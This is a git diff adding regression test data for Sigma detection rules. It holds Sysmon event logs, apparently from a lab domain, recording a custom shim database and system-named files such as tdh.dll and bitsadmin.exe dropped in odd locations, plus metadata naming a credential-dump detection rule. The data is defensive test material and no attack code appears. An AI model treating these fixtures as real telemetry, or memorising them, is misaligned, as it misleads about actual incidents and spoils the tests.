"ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:39:53.699", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Windows\\apppatch\\CustomSDB\\my_custom.sdb", + "CreationUtcTime": "2025-10-24 23:39:53.699", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/info.yml b/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/info.yml new file mode 100644 index 000000000..7c66c836a --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/info.yml @@ -0,0 +1,13 @@ +id: 094a2fb2-b1fd-4943-9379-c25e7ddb7136 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: ee63c85c-6d51-4d12-ad09-04e25877a947 + title: New Custom Shim Database Created +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.evtx diff --git a/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.evtx b/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.evtx new file mode 100644 index 0000000000000000000000000000000000000000..d4e9307b52d29f8a8bbaa56e417c3e86a45963bc GIT binary patch literal 69632 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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.json b/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.json new file mode 100644 index 000000000..53d3796c2 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:41:00.601559Z" + } + }, + "EventRecordID": 23503, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:41:00.589", + "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ProcessId": 10048, + "Image": "C:\\Windows\\system32\\cmd.exe", + "TargetFilename": "C:\\tdh.dll", + "CreationUtcTime": "2025-10-24 23:41:00.589", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/info.yml b/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/info.yml new file mode 100644 index 000000000..3039b03b8 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/info.yml @@ -0,0 +1,13 @@ +id: 61017761-38ab-4224-a43f-6cc53b67e374 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 13c02350-4177-4e45-ac17-cf7ca628ff5e + title: Files With System DLL Name In Unsuspected Locations +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.evtx diff --git a/regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.evtx b/regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.evtx new file mode 100644 index 0000000000000000000000000000000000000000..074dcff33f82169cf0f8fcb2a5d35c84302802ba GIT binary patch literal 69632 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 K1h;X4;QkAcKe2}Z literal 0 HcmV?d00001 diff --git a/regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.json b/regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.json new file mode 100644 index 000000000..75ad05708 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:41:48.497170Z" + } + }, + "EventRecordID": 24322, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:41:48.482", + "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ProcessId": 10048, + "Image": "C:\\Windows\\system32\\cmd.exe", + "TargetFilename": "C:\\bitsadmin.exe", + "CreationUtcTime": "2025-10-24 23:41:48.482", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_creation_system_file/info.yml b/regression_data/windows/file/file_event/file_event_win_creation_system_file/info.yml new file mode 100644 index 000000000..858e84b3a --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_creation_system_file/info.yml @@ -0,0 +1,13 @@ +id: e0123384-7d25-4178-b011-c1d37394d8dc +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: d5866ddf-ce8f-4aea-b28e-d96485a20d3d + title: Files With System Process Name In Unsuspected Locations +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.evtx diff --git a/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.evtx b/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.evtx new file mode 100644 index 0000000000000000000000000000000000000000..b1b8d69f5c646cc8540abaa7b8ab58dbe0c6e725 GIT binary patch literal 69632 zcmeHQ31AdO7Oj~i!w^CeR6GzhhFGXLqri&6weV+(Cqu&^=CSho}SDkGtu2@=u98g{eRbc z^{e{-s;=Czqk5E#Ef&5@BYEH^{Mtp75Q#S5Bz4|z+&|_Ib-szZfyx1u11bkp4yYVZ zIiPYt<$%fol>;gVR1T;dP&p7V2Xe=b${t-hM)2FcLtf##e-nXQ3EJ{TM_HV=LxK5tjm=Gf-i*aHsPENpy7+abcjbs&~Tyzob@Na?`fg{C8 zGaTE=_$|Sa@uCcSWnvUkCS$)0$J>ePajq1>QMBj>Wyj&9 z5b^QC<`^RRa8dJU(Nj#+uEePXkr0&?CHf-S6q(|O;f)NL)l1~y+yz)2L^-<6MZ06g z<+#OgWLXIwzeH1kvMxSaIPCFJ!Vzt2BF@DDX8P%k8;L7qvJ&J}DbCsBn~3OWl)1C9 z!xSG`86)~2Az?LEOC%_fU9`kbOUcvRsnMc9!(xn<#7+WjA_+TG1ZY`vwnOv>fCLL= z5s9bItoW{p$kvjP9%D64I9rDyU5_5JgvWjxE3$CM3Mfu&slb!!_l<8P5*%a{2==ti z%>;?o??lh!=c1-Wm#V69kikY|!}`W}fXSNT6E#6Pym_Pt&=jOg?9RrLvm=mj0{%%Y zoWkiK(@N0J&Tt}!N6WnB42W+moKdz!jZS2YX_*O%W+UZr5UEttn?OqxwrE>b)leiL zt46?GQtH$)Y80@y^~pX>zK1lmMgp=YoV=OBfHt@Wrr4lx){OtR%u$BC1pqT`#1R?*@lBn2_G z6+DJtTYpBUXfB+h8P1{rV2f6#h}F{Ja_x9~>?Mi>k%!-|QLT`s3I56DCbpVi#tE@9 z0Yz+-e#VZXLQ4#Z?hBo(o3ggzN*pUij+7yHCLoV=b2JY7rJ^vs{K|`8+MoSGAIA?R zcOBmq?Dg%mQb}1sd98Dn@>MtOKW$ldEmt12-6OsARX0ytoB8dsepN3)Yf1%#pTZ{9 z$+YC$LiA(Po}=A%IF6Im%)l?z(Zs^JWzn!?B$Upcfz?6QG6v!X0=uz*hb^YPDIg)B z+sNxr^QLYDC@YX-T&V3$p%JBRE7NMw>vwMALwPp4_NI1`K-XL(uQ}6u|C+^Qq_8)Q z5>86rN~S0DrS>tP6je*aQ+rd;h|+bC=}3Q>E?zU364Zuu0RVdj=In0O2 z!|0SYoIiVd zQ;59mEIR*Y?WvcS4R2Ak`k(D7n!Vam;Cd^Jye+K3Tb9SXjrslac4)}FP5({umRr8H zx1^on#tOxfqF$$WG^*d(p6YM7c%57MUKn{fqXsWo9`n-q`{(79ka$U`XZ)sl+3=Q> z-T`w&UuvJCbvzyIUOG~af9ysW22UmXg@&Q^OAg|4q@p**wrDG7W9@@C;AFf%>SyS! zauVLTOYx>iUbaHqc>w+n!an=5#$!Jf*Q8;k)=P%g#!e9zLW7Gu_tM{QtG}^ATimZ- zklOm{l%(mD-@f`CTAAI!uP>f#UG?iPGP^#Yf1Yez_4{ZZb>Ank^x2a~z4|@QGSkJ> zkKeP#we8HVt)*|jSB<-+nBA?`{(g!wRDUupj^Ud-wTl6)LEXFoE5!l=#{hg=2pzPx zY(>)(qrafs6`A&9=oV6cZKVI#79EA6OSRyd-omSEORht`x8&HAmTX4LjazaLVtYPT z)soZueyEll-bK7oOuf&BYROUG3)Pad=uq2hHrK*;k!IM~jzB#=mNBwu|?vG2Y_f{O6(I%=DCxr6HQD;us12+?IbIKn_ z{y*i93$bTx%~sq?=TvXS-KJV`suibNamGHm7%PK z_Ae=O!Ia0-b{Fm}e065OQ*)8{)di=XuKnJhq5UETNuxaVVXPF9?5p*b(?`9H$8c&I z>05J5VVuqJ?e^UBR@T6SO8 zrel-*^P10S2pwvRul6iPd>@eb+S~PyFupADv+geU@uGt4RpO-=pIGI^mo-!Pf~~d1 zS1VFRd>@qfX5@VLQDn<6OWb$F<^J`ZW4#|qf1%Z&;X<@W*`0=!HBjccvC;Xl7vIgFmS1-WW7_M>K6jS(`40n7CFn~cOZ0~?Yo_qE#P{Xi?`Ld*CxEI= ze4Rn75(lFH`~dWiFF<`>j^oqLy>Q4INzR<7yG>YKzG2pKAzYttI}}IwQ$76+KzUg5 zV9@R{VdOz;$ph|{NjkGce>`B#6b~$UaO38}xZCm70xDp{178l{FyTyiCjs}B67LS5 zgcI+}P0Bq>^oKWVrtr4J+gR=|mgT+!Msj3hJWDpdWCi4$PAq6 z2r8_(Y{|Qh`7ynhuKR1{iktRo-}upZLHtMrKOT|%c%yV|80|q<6MMiC{qch}Q~a>x zhtVDoKWfhn&_l2Hi3j{1w@UKii_L#F@F5cKaV)W2OPBlG(>8TqvbA7dheqCZAZw=h zV95vH_jFKVzpM}FceTWKPwVj!#+M~t;&!>uKT*>8}#J5S4J3_)YbU!&u%=paZ&RE_(Yw6tOC42XI%P(u@ z!B_do1IIzM7=f|;J}&X?TM!z)!Ij@X8vJZ5(HCDTzd5l&ux1{7Rrw8!Zw){BT8Xc1 z?Xlv@h{m~C;yuG$ZpWR=``pv#yStC(>z{ia4L><+=D}B$-@y3R@RL6w@x46TIm(M~ zB>dzo(I397nZnnyeP#5Q)!t8j%g-f8oklknQiM<9)3grM&S%XOzCqwy!;iW_;=4U* zXoSlzOFU?ExhKCourtl2{U-&n~Sw=t1GZNpf^COKfOKe%@a(_1W z#+nZh>+e6`NCMtq-@_zpSgPa&1x;QVYxKRHYE#dia2^ZgEV>6V&# z@Kt`czTVZ6277P$ys9G+g$FVjrN?|qvQXY_KCOrvSuE9m7lFP z_+ow>Bfc9YzGu2Z!#B9{YxI+|L|=TV{3aou$(niaRpmD@zSaHY_;T(hiSH}RT7K;H zqjpJe)$?!T^?)O7KX?7-0}AZF+)!DtE#)vmk@Bm+`>;v#4NgExZEnHH&m(vRR5%6| zXznZe79-6VNJQvCGdX!?0pvOV=wWH{H-uXBx&5lm-balSn!V36OCKGeS^DhppfSzJ zM+c~VZ;zMr@6iF8f6p`19vz^W_B>znAZ2J;HcceWm&Y^WQA(O!(=*#0sZX=rY3kDq za-R9>;^iE4l!E4<(^Ak3U-3Mb9M2d>H>DZlJTt@5_kU?-IL!an7$b;$=YONAv*>Pj zA&I8p6WE9kFjpJ0yIw{FG3TD@>~gO-(5~O=9rvW&J5h+e!1O}o40F>{!j%QDMF~eg zGEkQK8J&(id|sCC?OR$I%J=Dct8be$NeJqoOxqu)T|MOfxwBkHV_y5)k6ga1s=iR= z8&v-vE#J0gnmPLkw#}~1%V<6^V7f`MPCvpVvNYrUOFufb0T| zJ9t6bg*)>)n%D)Z5^Na3Nh{CL843~1;$|$-9}!qHMFdMC82#k6h?~7A@xEqoIPo@% zo3TWHc(Y~-Z%e$51;0MxX0~Pz)3_tD2NW;)x8%p8&xeyAW^pr?=#L+)nc{~fKaBPu z=(w3a{?8aUdr9))P(e>a{lM>q^;JKZeJ6k=I$OEie;%Ek`TV1=_TF*O`&Pi3DLz>8 z!6$A;em0|D=RXqPZLdZeUzWK06_-2Zy$3U&zhgi~*U!B8vSte3y5Re=#P|DNc@ZwZ zEHO3P<&K?va^FW6t-X5HdN01LnZma&_->Z?4q6>)d|6_PT`qTe>iq1L{p~XsmwEAJ z%@n@D;7fjTqkY~Y@xAnb~ZeetF8yB{lS=D}B$-&)}7YoE7Dd=n3hjBxp7 ziCgEo+$9&>p11JL>t_vo)?0pAGY`J1{MG_rqkVS5Px_j~_o&Fd?hTK9rWsP#+=coM zi|=fy2nljr)Q-&tj*Cu#k5|P-h2OYnCJ>Zy(KAirqRBW`fq%o%-(?KiaWqr$wfK5q zGU|4o|F}V8r_9R(M_ulooi^p%vvg|f(e3e2i2YFy3Ffb|0ztIG-H+XB%Uu2nm4EV! zrsH>;v;&`hnQyQIQTCo&p85-Nn=%~R7q8eec<0Mm@BLsq()vuc165TC$_^lde$(;O zOeh#WI}qU*E0ffpQD8DFqhM(ijG>m=$5=%f*$a-ZZkKkW5>_&b0&&}eiEYTkc zSTjWeOA;94DdzFj(~RHmdtKuFY-%|1HjA&aM1Od*W(sdhyp4svKH{q)<`iRmwNmn9 z-O6zC!z{ka68-UmHBf`P3OFeTDc8zd5jGiVv22s2*R{@HP7X-jw+6IvinADUG6DA$MxJa zV?*l-d}5gKWz7`6b-{NB+w)#GM7aE}lM?5|yWCw`T$VR`+}eq4FpmP`%bF>C>w@oF z65p>Li!{D0@wurk_bunQ?|W~>AAWAL$cry)rtqx`zHdu>Z~SUXNaZ)U_>3{W$`XC? zb;b%&gq1b(;H%;@f&KS2>fd)HzAMg{781Upk4t2Ur!8=~r=HWc&)=W!Tr}w%Z~0}- 